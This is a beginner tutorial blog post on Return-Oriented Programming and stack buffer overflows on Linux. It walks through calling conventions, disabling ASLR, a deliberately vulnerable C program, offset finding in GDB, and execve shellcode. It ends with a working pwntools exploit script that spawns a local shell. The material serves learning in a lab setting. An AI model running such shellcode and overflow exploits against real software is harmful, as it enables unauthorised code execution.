Preface

My advisor recently assigned me a task involving the reproduction of SGX-related attacks, which use ROP (Return-Oriented Programming). Since I had zero prior experience with binary exploitation or reverse engineering, I had to learn ROP from scratch. While there are plenty of tutorials online, very few start truly from the ground up. This post is my attempt at documenting what I learned, structured from zero for beginners.

My primary learning resource was a Chinese blog series called “Step by Step ROP” (一步一步学ROP):

  1. https://wooyun.js.org/drops/%E4%B8%80%E6%AD%A5%E4%B8%80%E6%AD%A5%E5%AD%A6ROP%E4%B9%8Blinux_x64%E7%AF%87.html
  2. http://drops.xmd5.com/static/drops/tips-6597.html
  3. https://github.com/zhengmin1989/ROP_STEP_BY_STEP

Those articles assume a fair amount of background knowledge about binary execution and compilation, which isn’t great for beginners (or for someone as green as I was at the time). This post only assumes familiarity with basic x86 assembly instructions. All experiments are performed on Linux.

Background

What Is ROP

Return-Oriented Programming. The name is quite self-explanatory in English: programming oriented around the ret instruction. The ret instruction does one thing: pop IP—it copies the value at the top of the stack into the instruction pointer, causing the program to jump (i.e., “return” from a function). When we control the stack, we control where the program jumps, enabling arbitrary code execution.

Stack

memory structure

The figure shows the memory layout of a running program. The stack grows from high addresses to low addresses: push decrements the stack pointer, pop increments it. A stack overflow occurs when data in memory overwrites the top of the stack. If a buffer overflow vulnerability exists, we can control the stack and thus craft return addresses to hijack program execution.

Parameter Passing

Why do we need to understand parameter passing? Remember, our goal is to execute desired code after ret. To achieve this, calling system functions is essential—for example, system("/bin/sh") spawns a shell for us. But we can’t just call system; we also need to pass the argument "/bin/sh". Once we understand how arguments are passed, we can construct a stack overflow that arranges the calling convention correctly.

x86 and x64 handle parameter passing slightly differently. On x86, all parameters are pushed onto the stack. On x64, the first six parameters are passed via registers: rdi, esi, edx, ecx, r8d, r9d; any remaining parameters are pushed onto the stack. Let’s verify this.

Our simple test program—printf with 9 arguments:

#include<stdio.h>

int main(){
    printf("there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d", 1, 2, 3, 4, 5, 6, 7, 8);
    return 1;
}

To view the generated assembly:

$ gcc -S ./printf8.c [-m32]

The -m32 flag is optional and generates 32-bit assembly.

x86

        .file   "x86simple.c"
        .text
        .section        .rodata
        .align 4
.LC0:
        .string "there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        leal    4(%esp), %ecx
        .cfi_def_cfa 1, 0
        andl    $-16, %esp
        pushl   -4(%ecx)
        pushl   %ebp
        .cfi_escape 0x10,0x5,0x2,0x75,0
        movl    %esp, %ebp
        pushl   %ebx
        pushl   %ecx
        .cfi_escape 0xf,0x3,0x75,0x78,0x6
        .cfi_escape 0x10,0x3,0x2,0x75,0x7c
        call    __x86.get_pc_thunk.ax
        addl    $_GLOBAL_OFFSET_TABLE_, %eax
        subl    $12, %esp
        pushl   $8
        pushl   $7
        pushl   $6
        pushl   $5
        pushl   $4
        pushl   $3
        pushl   $2
        pushl   $1
        leal    .LC0@GOTOFF(%eax), %edx
        pushl   %edx
        movl    %eax, %ebx
        call    printf@PLT
        addl    $48, %esp
        movl    $1, %eax
        leal    -8(%ebp), %esp
        popl    %ecx
        .cfi_restore 1
        .cfi_def_cfa 1, 0
        popl    %ebx
        .cfi_restore 3
        popl    %ebp
        .cfi_restore 5
        leal    -4(%ecx), %esp
        .cfi_def_cfa 4, 4
        ret
        .cfi_endproc

Notice that all parameters—including the integers 1 through 8 and the format string—are pushed onto the stack. Lines starting with “.” are directives for the linker and can be ignored.

x86-64

        .file   "print8.c"
        .text
        .section        .rodata
        .align 8
.LC0:
        .string "there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        pushq   %rbp
        .cfi_def_cfa_offset 16
        .cfi_offset 6, -16
        movq    %rsp, %rbp
        .cfi_def_cfa_register 6
        subq    $8, %rsp
        pushq   $8
        pushq   $7
        pushq   $6
        movl    $5, %r9d
        movl    $4, %r8d
        movl    $3, %ecx
        movl    $2, %edx
        movl    $1, %esi
        leaq    .LC0(%rip), %rdi
        movl    $0, %eax
        call    printf@PLT
        addq    $32, %rsp
        movl    $1, %eax
        leave
        .cfi_def_cfa 7, 8
        ret
        .cfi_endproc

Here we can see that after pushing 8, 7, and 6 onto the stack, the remaining parameters are moved into the registers mentioned above.

Protection Mechanisms

The system-level protection is ASLR. Other protections can be checked with the checksec command (included in the pwntools Python package):

➜  rop checksec ./a.out                                                                    
[*] '/home/ya0guang/Code_obo/rop/a.out'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Arch indicates the target architecture; the other fields are searchable online.

To disable (or enable) system-level ASLR:

# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# Enable ASLR
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Hands-On Practice

This section primarily follows the “Step by Step ROP” experiments. I strongly recommend installing gef as a GDB enhancement for debugging.

x86 ROP 101

Using the code from the GitHub repo mentioned above:

#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
}

int main(int argc, char** argv) {
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}

To compile with minimal protections (making exploitation easier):

gcc -fno-stack-protector -z execstack -no-pie -o level1 level1.c -m32
# The original article used:
gcc -fno-stack-protector -z execstack -o level1 level1.c

Since the original tutorial is from four years ago, GCC’s default options have changed. Running checksec on our compiled binary reveals that the PIE setting differs from the repo’s binary—this cost me an entire evening of debugging. Also remember to add -m32 when experimenting on a 64-bit system.

[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments                                    
➜  linux_x86 git:(master) ✗ gcc -fno-stack-protector -z execstack -o level1 level1.c
➜  linux_x86 git:(master) ✗ checksec ./level1                                       
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
➜  linux_x86 git:(master) ✗ gcc -fno-stack-protector -z execstack -no-pie -o level1 level1.c -m32
➜  linux_x86 git:(master) ✗ checksec ./level1                                                    
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

The vulnerability in vulnerable_function is obvious: read attempts to read 256 bytes into a 128-byte buffer, which can cause a stack overflow. Let’s use GDB (with gef) to test this.

Finding the Overflow Offset

Open the program in GDB. Use pattern create 150 to generate a 150-byte de Bruijn pattern string. Run the program with r, paste the pattern as input, and observe the resulting segmentation fault.

The crash address is 0x6261616b. This value came from our pattern string: the overflow caused ret to pop this value into the instruction pointer. The program crashed because it couldn’t find valid code at that address. Use pattern search 0x6261616b to find that the offset is 140 bytes—meaning the overflow occurs at the 140th character. When constructing our payload, we need to place our desired return address starting at position 140.

A note on return addresses: when call executes, the CPU pushes the return address (typically the next instruction after call) onto the stack, then jumps. So after call, the stack top contains the return address, followed by function arguments.

$ gdb ./level1
gef➤  pattern create 150
[+] Generating a pattern of 150 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabma
[+] Saved as '$_gef0'
gef➤  r
Starting program: /home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1 
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabma

Program received signal SIGSEGV, Segmentation fault.
0x6261616b in ?? ()
...
gef➤  pattern search 0x6261616b
[+] Searching '0x6261616b'
[+] Found at offset 140 (little-endian search) likely

While gef’s output is verbose, it’s incredibly informative.

Building the Payload

Let’s start by building a payload using shellcode. What is shellcode? Simply put, it’s code that gives you a shell! So how do we construct it? Currently, we can control 140 bytes of input plus a return address. We want the program to ret into our controlled input buffer, where our shellcode resides. A popular approach is calling system("/bin/sh"), but that’s for our next exercise (ret2libc). For now, we’ll use the shellcode from the tutorial:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

The tutorial doesn’t explain what this does, so let’s disassemble it:

    xor eax, eax    ; reset the register
    push eax        ; push null terminator
    push 0x68732f2f ; push /bin//sh
    push 0x6e69622f
    mov ebx, esp    ; ebx = /bin//sh
    push eax
    mov edx, esp    ; envp = 0
    push ebx
    mov ecx, esp    ; argv = [filename, 0]
    mov al, 11      ; syscall 11 (execve)
    int 0x80        ; trigger syscall
    ; source: http://www.expku.com/shellcode/8015.html

Much more readable, right? To understand this, read from the bottom up. int 0x80 triggers interrupt 0x80—essentially a special function call. On Linux, software interrupt 0x80 executes a syscall, with the syscall number stored in al (the low 8 bits of eax). The observant reader may notice that the pushed values appear reversed—that’s due to little-endian byte order. Don’t worry about this; pwntools handles the conversion for you.

Using this syscall table, we find that syscall 11 is sys_execve. Looking at its source:

asmlinkage int sys_execve(struct pt_regs regs)
{
	int error;
	char * filename;
	filename = getname((char *) regs.ebx);
	error = PTR_ERR(filename);
	if (IS_ERR(filename))
		goto out;
	error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx, &regs);
	if (error == 0)
		current->ptrace &= ~PT_DTRACE;
	putname(filename);
out:
	return error;
}

The shellcode pushes “/bin/sh” with a null terminator onto the stack, passing it as the filename argument to sys_execve, which executes /bin/sh—giving us a shell.

Our payload structure is straightforward:

payload = shellcode + padding to reach 140 bytes + shellcode’s start address

Feed this payload as user input and it will be executed.

Finding the Start Address

This largely follows the Step by Step ROP x86 guide. Note that on Ubuntu 18.04 LTS, the addresses when using pwntools may differ slightly from those obtained via direct core dumps, so I recommend using pwntools directly.

from pwn import *

shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

p = process("./level1")
ret = 0xffffcea0
# Use any address for the first run

payload = shellcode + b'A' * (140 - len(shellcode)) + p32(ret)
# p32() handles the endianness conversion

p.send(payload)
p.interactive()
# Opens an interactive shell

Enable core dumps:

ulimit -c unlimited
sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'
➜  linux_x86 git:(master) ✗ python ./pwn1.py
[+] Starting local process './level1': pid 4757
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ sodaod
[*] Process './level1' stopped with exit code -11 (SIGSEGV) (pid 4757)
[*] Got EOF while sending in interactive
➜  linux_x86 git:(master) ✗ gdb ./level1 /tmp/core.1570062471.4757 
Core was generated by `./level1'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xaaaaaaaa in ?? ()
gef➤  x/10s $esp-144
0xffffcea0:     "1\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀", 'A' <repeats 115 times>, "\252\252\252\252P\317\377\377"
...
gef➤  quit
➜  linux_x86 git:(master) ✗ python ./pwn1.py                     
[+] Starting local process './level1': pid 4816
[*] Switching to interactive mode
$ whoami
ya0guang
$  

On the first run, use any address for ret. When it crashes, use GDB to examine the core dump at $esp-144 to find the correct address. Insert that address, run again, and—we’ve got a shell. Pwned!